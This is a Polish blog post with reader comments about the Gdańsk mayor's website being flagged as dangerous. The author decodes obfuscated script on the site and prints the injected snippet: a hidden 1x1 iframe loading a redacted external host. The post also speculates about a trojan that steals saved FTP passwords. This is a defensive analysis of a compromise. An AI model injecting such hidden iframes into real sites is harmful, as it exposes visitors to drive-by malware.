Wirus prezydencki
Dziś rano czytając RSS jakie mam w Google Readerze moją uwagę przykuł tekst na blogu Tomka Topy: “Strona Prezydenta Gdańska może wyrządzić szkody na Twoim komputerze…”. Tomek pisze, że tak Google pisze przy wyszukiwaniu i tak twierdzi jego antywirus AVG po zapisaniu strony na dysk.
Tak się jakoś złożyło, że ostatnio piszę sporo na temat bezpieczeństwa, więc i tym mogłem się zająć. Korzystając z mojej niewielkiej wiedzy na temat JavaScriptu sięgnąłem do źródła owej niebezpiecznej witryny i ujrzałem tam fragment kodu JavaScript, wspólny dla praktycznie wszelkiego typu złośliwych witryn - zakodowany tekst, rozkodowywany przez skrypt i wprowadzany do kodu strony poprzez document.write. Dlaczego zakodowany? Aby żaden antywirus nie zobaczył tego “na pierwszy rzut oka” oraz żeby żaden człowiek nie zobaczył tego na pierwszy rzut oka. Chwilka zabawy z trzema skryptami JS umieszczonymi na witrynie ujawniła co tak naprawdę do kodu strony wstrzykują.
<div style="visibility:hidden">
<iframe src="http://*****.com/**/upl/"
width=1 height=1></iframe></div>
Te trzy kawałki kodu różniły się tylko adresami w tych <iframe></iframe>. Co znajdowało się pod nimi? Niestety tego nie wiemy i być może się już nie dowiemy, bo dwa już nie mogą zostać znalezione, a jeden serwuje nam błąd 404. Spodziewam się, że tam znajdowały się jakieś niebezpieczne kody, być może jakieś trojany atakujące czy to Internet Explorera czy Firefoksa, jak pokazywał ten Łańcuszkowy atak na Gadu-Gadu sprzed blisko roku.
Strona zatem już niebezpieczna nie jest.
Pozostaje pytanie jednak - skąd niby niebezpieczny kod miał się wziąć na stronie prezydenta Gdańska? O uszy obiło mi się jakiś czas temu, że istnieje wirus/trojan/robak (dziś już coraz trudniej chyba określić co jest co), który korzystając z zapisanych haseł o FTP w programie Total Commander na komputerze ofiary łączy się z owymi serwerami FTP, a następnie modyfikuje pliki index.html czy index.php dodając do nich właśnie niebezpieczny kod - prowadzący choćby do strony przez którą taki wirus atakuje. Niestety nic na ten temat nie mogę wygooglać - jedyne co znalazłem na razie to informacje na temat trojanów z rodziny Trojan-PSW.Win32.PdPinch i Trojan-PSW.Win32.LdPinch których zachowanie jest o tyle podobne, że też “kradną” dane do łączenia się m.in. z serwerami FTP z użyciem programów Total Commander czy FileZilla.
Znalazłem. Zenux robi coś w tym stylu, może to jakaś jego odmiana.
Obrona? Nie zachowywać haseł w programach.
Liczba komentarzy: 4
»Wątek RSS dla komentarzy tego wpisu · Adres trackback
wrzesień 16, 2007 godzina 09:12
Oj tam, ja zapisuje i nigdy się z czymś takim nie spotkałem, wolę zapisać niż pamiętać ;)
wrzesień 16, 2007 godzina 09:44
Domyślam się, że to jakiś robal. Szczęście też, że strony do których kierują iframe’y już nie działają.
Nie jest to jakieś “super news”, chodzi mi raczej o fakt, że oficjalną stroną powinien się jednak ktoś zajmować i patrzeć co się z nią dzieje. Według WebArchive syfik siedzi już tam od maja 2007. Google dodało stronę do czarnej listy w lipcu. Mamy połowę września i nic się nie zmieniło.
Co jak co, ale ktoś się powinien zainteresować tym, że od dwóch miesięcy nikt nie wszedł na stronę Prezydenta Miata Gdańska z Googli. W UM na pewno się ktoś zajmuje prasą i powinien śledzić co się o Prezydencie w internecie pisze. Wystukuję “Adamowicz” i na dzień dobry mam zablokowaną stronę główną. No halo, coś chyba nie tak?
wrzesień 16, 2007 godzina 18:32
W TotalCmd przydałaby się opcja ‘hasła głównego’, która broniłaby przed takim właśnie niedozwolonym dostępem do listy haseł.
A najbezpieczniej to trzymać wszystkie hasła np. w KeePass (http://keepass.info).
wrzesień 17, 2007 godzina 10:36
[...] w serwisie StopBadware.org. Zaznaczyłem, że strona niebezpieczna nie jest. Odesłałem też do artykułu Marcina. Zapytałem też, czy jest szansa zobaczyć tekst przed publikację. Niestety nie było takiej [...]